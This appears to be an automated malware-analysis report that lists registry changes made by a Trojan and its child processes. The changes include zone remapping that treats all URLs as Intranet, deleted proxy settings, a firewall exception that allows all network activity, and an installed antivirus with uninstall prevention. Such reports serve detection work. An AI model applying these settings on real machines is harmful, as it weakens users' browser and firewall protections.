[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "MM-liao8863.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\QuanQuan]
"LastTime" = "Type: REG_QWORD, Length: 8"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1437574637"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8C 2E F4 CB F3 7C 8A 2B C9 CF 9B 62 83 0D C7 05"

[HKLM\SOFTWARE\QuanQuan]
"RunCount" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\9158ktv\DownLoad]
"9158chat2_ktv088_63.exe" = "9158chat2_ktv088_63"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process BaiduP2PService.exe:252 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AB FA 69 4C C0 C7 50 A1 D7 27 0F B2 91 8C 1E AA"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2175ADB5-255E-4f1b-A091-EA0BE135D9E0}]
"AppName" = "BaiduP2PService.exe"
"Policy" = "3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2175ADB5-255E-4f1b-A091-EA0BE135D9E0}]
"AppPath" = "%Program Files%\tools"

The process BaiduP2PService.exe:472 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download]
"QQPCDownload71960.exe" = "QQPCDownload71960"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download]
"MM-liao8863.exe" = "DownloadInstall Microsoft Ã¥Å¸ÂºÃ§Â¡â‚¬Ã§Â±Â»Ã¥Âºâ€Ã§â€Â¨Ã§Â¨â€¹Ã¥ÂºÂ"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download]
"install1393485.exe" = "install1393485"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EB 86 7E 81 D2 97 6E 60 45 C3 D1 35 EA 7E 52 3D"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The process xianfeng.exe:272 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6A 11 AE 1D 91 1E 2A 9D 7D DA 54 76 F9 70 26 CE"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Browser]
"ieversion" = "6"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process RsMgrSvc.exe:1936 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "81 53 FB AD 0B 3C D3 55 0E E3 15 E6 AA 3D ED 0A"

The process QQPCDownload71960.exe:2776 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7D D8 20 E4 30 8C 29 EA ED 91 01 ED 69 00 98 F0"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download]
"QQPCDownload71960.exe" = "%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\QQPCDownload71960.exe:*:Enabled:Tencent Download Program"

The process regsvr32.exe:2380 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "21 6F 6F 82 35 2B E6 B4 42 4C C9 1E F6 D5 B3 F6"

[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\TypeLib\{9D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0\0\win32]
"(Default)" = "d:\Program Files\9158KTV\Invoker9158.dll"

[HKCR\Invoker9158.InvokeChat]
"(Default)" = "InvokeChat Class"

[HKCR\Invoker9158.InvokeChat.1]
"(Default)" = "InvokeChat Class"

[HKCR\Invoker9158.InvokeChat\CurVer]
"(Default)" = "Invoker9158.InvokeChat.1"

[HKCR\Interface\{2967511D-5AED-4479-906D-FEBE89CA00E9}\TypeLib]
"Version" = "1.0"

[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\VersionIndependentProgID]
"(Default)" = "Invoker9158.InvokeChat"

[HKCR\TypeLib\{9D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0]
"(Default)" = "Invoker9158 1.0 Type Library"

[HKCR\Interface\{2967511D-5AED-4479-906D-FEBE89CA00E9}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\TypeLib\{9D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0\HELPDIR]
"(Default)" = "d:\Program Files\9158KTV\"

[HKCR\TypeLib\{9D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\Invoker9158.InvokeChat.1\CLSID]
"(Default)" = "{3D0F9B9E-3987-4261-88A6-382B210CC484}"

[HKCR\Interface\{2967511D-5AED-4479-906D-FEBE89CA00E9}\TypeLib]
"(Default)" = "{9D71FFCB-5418-4344-BC2C-A87D735E05B7}"

[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\ProgID]
"(Default)" = "Invoker9158.InvokeChat.1"

[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\TypeLib]
"(Default)" = "{9D71FFCB-5418-4344-BC2C-A87D735E05B7}"

[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}]
"(Default)" = "InvokeChat Class"

[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\InprocServer32]
"(Default)" = "d:\Program Files\9158KTV\Invoker9158.dll"

[HKCR\Interface\{2967511D-5AED-4479-906D-FEBE89CA00E9}]
"(Default)" = "IInvokeChat"

[HKCR\Interface\{2967511D-5AED-4479-906D-FEBE89CA00E9}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Invoker9158.InvokeChat\CLSID]
"(Default)" = "{3D0F9B9E-3987-4261-88A6-382B210CC484}"

The process regsvr32.exe:2448 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1C 27 00 09 3B BD 71 E4 0F BB D9 70 13 B6 83 45"

[HKCR\CLSID\{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}\InprocServer32]
"(Default)" = "d:\Program Files\9158KTV\WebVideo.dll"
"ThreadingModel" = "Apartment"

[HKCR\WebVideo.ExeClient]
"(Default)" = "ExeClient Class"

[HKCR\TypeLib\{16FD93FF-DAB2-4658-B17B-F714A86D942F}\1.0]
"(Default)" = "WebVideo 1.0 Type Library"

[HKCR\TypeLib\{16FD93FF-DAB2-4658-B17B-F714A86D942F}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\WebVideo.ExeClient.1]
"(Default)" = "ExeClient Class"

[HKCR\WebVideo.ExeClient\CurVer]
"(Default)" = "WebVideo.ExeClient.1"

[HKCR\TypeLib\{16FD93FF-DAB2-4658-B17B-F714A86D942F}\1.0\HELPDIR]
"(Default)" = "d:\Program Files\9158KTV\"

[HKCR\CLSID\{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}]
"(Default)" = "ExeClient Class"

[HKCR\Interface\{EC598E09-8FAE-497C-9351-087B4B0B757B}]
"(Default)" = "IExeClient"

[HKCR\CLSID\{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}\VersionIndependentProgID]
"(Default)" = "WebVideo.ExeClient"

[HKCR\WebVideo.ExeClient\CLSID]
"(Default)" = "{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}"

[HKCR\Interface\{EC598E09-8FAE-497C-9351-087B4B0B757B}\TypeLib]
"Version" = "1.0"
"(Default)" = "{16FD93FF-DAB2-4658-B17B-F714A86D942F}"

[HKCR\Interface\{EC598E09-8FAE-497C-9351-087B4B0B757B}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\WebVideo.ExeClient.1\CLSID]
"(Default)" = "{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}"

[HKCR\CLSID\{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}\ProgID]
"(Default)" = "WebVideo.ExeClient.1"

[HKCR\Interface\{EC598E09-8FAE-497C-9351-087B4B0B757B}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}\TypeLib]
"(Default)" = "{16FD93FF-DAB2-4658-B17B-F714A86D942F}"

[HKCR\TypeLib\{16FD93FF-DAB2-4658-B17B-F714A86D942F}\1.0\0\win32]
"(Default)" = "d:\Program Files\9158KTV\WebVideo.dll"

The process regsvr32.exe:2328 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKCR\Interface\{0C1CF2DF-05A3-4FEF-8CD4-F5CFC4355A16}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\ImageOle.GifAnimator.1]
"(Default)" = "GifAnimator Class"

[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\Version]
"(Default)" = "1.0"

[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\VersionIndependentProgID]
"(Default)" = "ImageOle.GifAnimator"

[HKCR\Interface\{0C1CF2DF-05A3-4FEF-8CD4-F5CFC4355A16}\TypeLib]
"(Default)" = "{710993A2-4F87-41D7-B6FE-F5A20368465F}"

[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\TypeLib]
"(Default)" = "{710993A2-4F87-41D7-B6FE-F5A20368465F}"

[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\ToolboxBitmap32]
"(Default)" = "d:\Program Files\9158KTV\ImageOle.dll, 102"

[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\InprocServer32]
"(Default)" = "d:\Program Files\9158KTV\ImageOle.dll"

[HKCR\TypeLib\{710993A2-4F87-41D7-B6FE-F5A20368465F}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\TypeLib\{710993A2-4F87-41D7-B6FE-F5A20368465F}\1.0]
"(Default)" = "ImageOle 1.0 Type Library"

[HKCR\ImageOle.GifAnimator\CurVer]
"(Default)" = "ImageOle.GifAnimator.1"

[HKCR\TypeLib\{710993A2-4F87-41D7-B6FE-F5A20368465F}\1.0\HELPDIR]
"(Default)" = "d:\Program Files\9158KTV\"

[HKCR\Interface\{0C1CF2DF-05A3-4FEF-8CD4-F5CFC4355A16}\TypeLib]
"Version" = "1.0"

[HKCR\ImageOle.GifAnimator]
"(Default)" = "GifAnimator Class"

[HKCR\ImageOle.GifAnimator\CLSID]
"(Default)" = "{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}"

[HKCR\Interface\{0C1CF2DF-05A3-4FEF-8CD4-F5CFC4355A16}]
"(Default)" = "IGifAnimator"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "09 47 06 DB 24 F6 FB 0E AB 15 D2 57 42 3D E2 D3"

[HKCR\ImageOle.GifAnimator.1\CLSID]
"(Default)" = "{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}"

[HKCR\Interface\{0C1CF2DF-05A3-4FEF-8CD4-F5CFC4355A16}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\TypeLib\{710993A2-4F87-41D7-B6FE-F5A20368465F}\1.0\0\win32]
"(Default)" = "d:\Program Files\9158KTV\ImageOle.dll"

[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\ProgID]
"(Default)" = "ImageOle.GifAnimator.1"

[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}]
"(Default)" = "GifAnimator Class"

The process regsvr32.exe:2480 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "82 F0 F9 DF 51 78 58 28 95 D9 6D 0E 0B C2 39 DE"

[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\Interface\{1967511D-5AED-4479-906D-FEBE89CA00E9}\TypeLib]
"(Default)" = "{1D71FFCB-5418-4344-BC2C-A87D735E05B7}"

[HKCR\TypeLib\{1D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0\0\win32]
"(Default)" = "d:\Program Files\9158KTV\login9158.dll"

[HKCR\TypeLib\{1D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0\HELPDIR]
"(Default)" = "d:\Program Files\9158KTV\"

[HKCR\Login9158.Fun.1\CLSID]
"(Default)" = "{6C029846-C8D3-440A-B9B6-9CF9A73678E2}"

[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}]
"(Default)" = "Fun Class"

[HKCR\Login9158.Fun]
"(Default)" = "Fun Class"

[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\InprocServer32]
"(Default)" = "d:\Program Files\9158KTV\login9158.dll"

[HKCR\TypeLib\{1D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0]
"(Default)" = "Login9158 1.0 Type Library"

[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\TypeLib]
"(Default)" = "{9D71FFCB-5418-4344-BC2C-A87D735E05B7}"

[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\ProgID]
"(Default)" = "Login9158.Fun.1"

[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\VersionIndependentProgID]
"(Default)" = "Login9158.Fun"

[HKCR\Interface\{1967511D-5AED-4479-906D-FEBE89CA00E9}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{1967511D-5AED-4479-906D-FEBE89CA00E9}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Login9158.Fun\CLSID]
"(Default)" = "{6C029846-C8D3-440A-B9B6-9CF9A73678E2}"

[HKCR\Login9158.Fun\CurVer]
"(Default)" = "Login9158.Fun.1"

[HKCR\Interface\{1967511D-5AED-4479-906D-FEBE89CA00E9}\TypeLib]
"Version" = "1.0"

[HKCR\Interface\{1967511D-5AED-4479-906D-FEBE89CA00E9}]
"(Default)" = "IFun"

[HKCR\Login9158.Fun.1]
"(Default)" = "Fun Class"

[HKCR\TypeLib\{1D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0\FLAGS]
"(Default)" = "0"

The process install1393485.exe:1148 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKCR\CLSID\{F1CF8F61-AB1D-11d4-ABBD-0050BACEC828}\RzNBMlVLLUswUDBORC1MMEVGU1UtRkg1MzAw]
"ProcDll" = "1478494857"

[HKLM\SOFTWARE\rising\RAV]
"Name" = "Rising AntiVirus 2012"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCR\CLSID\{AC3909C5-DC79-47e5-86CA-7FB5C041A37C}]
"rstrayexe" = "gWx0Lv5HQEgHSwg0HF4LXHw="

"RAV" = "gWx0Lv5HYHol0A=="

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RSD]
"InstallLocation" = "%Program Files%\Rising\RSD"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCR\CLSID\{AC3909C5-DC79-47e5-86CA-7FB5C041A37C}]
"InstallPath" = "gWx0Lv5HF2shdi4fc3Y3cDtobmkaSgAjVWcheD8D"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RSD]
"DisplayVersion" = "23.00.01.03"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\rising\RAV\cfgUn\PreventUninstallSwitch]
"PreventUninstallSwitch" = "1"

[HKCR\CLSID\{F1CF8F61-AB1D-11d4-ABBD-0050BACEC828}\RzNBMlVLLUswUDBORC1MMEVGU1UtRkg1MzAw]
"ProcKind" = "5"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCR\CLSID\{F1CF8F61-AB1D-11d4-ABBD-0050BACEC828}\RzNBMlVLLUswUDBORC1MMEVGU1UtRkg1MzAw]
"ProcInfo" = "1446872457"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCR\CLSID\{AC3909C5-DC79-47e5-86CA-7FB5C041A37C}]
"Title" = "gWx0Lv5H-suj/tn/-pC71NWzoQ=="

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RSD]
"UninstallString" = "%Program Files%\Rising\RSD\Setup.exe /UNINSTALL /PRODUCT=RSD"
"Publisher" = "Beijing Rising Information Technology, Inc."

[HKCR\CLSID\{AC3909C5-DC79-47e5-86CA-7FB5C041A37C}]
"ravmonexe" = "gWx0Lv5HQFoFVAYjVhUWQQwq"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RSD]
"URLInfoAbout" = "http://help.ikaka.com/"

[HKLM\SOFTWARE\rising\RAV]
"DataPath" = "%Documents and Settings%\All Users\Application Data\Rising\RAV"
"Type" = "17"
"InstallPath" = "%Program Files%\Rising\RAV"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Services]
"Rising" = "Admin Test"

[HKCR\CLSID\{AC3909C5-DC79-47e5-86CA-7FB5C041A37C}]
"monShowName" = "gWx0Lv5HYFoFGTooQE0aWgxX"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9B EB 5D B8 D3 40 DB 2E 70 4B 40 80 D4 A9 85 4B"

[HKLM\SOFTWARE\rising\RAV]
"(Default)" = "Rising Software Deployment System"
"Version" = "24.00.43.49"

[HKCR\CLSID\{AC3909C5-DC79-47e5-86CA-7FB5C041A37C}]
"regtray" = "gWx0Lv5HYFoFbTsMa1I="

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCR\CLSID\{CAA2D3B1-4BB5-4a45-A17A-122773379D99}]
"ProcID" = "{F2565346-E9F9-6648-3030-303030303030}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RSD]
"DisplayName" = "Rising Software Deployment System"
"DisplayIcon" = "%Program Files%\Rising\RSD\Setup.exe"

[HKCR\CLSID\{AC3909C5-DC79-47e5-86CA-7FB5C041A37C}]
"monServerName" = "gWx0Lv5HYEghWB8AXVVr"

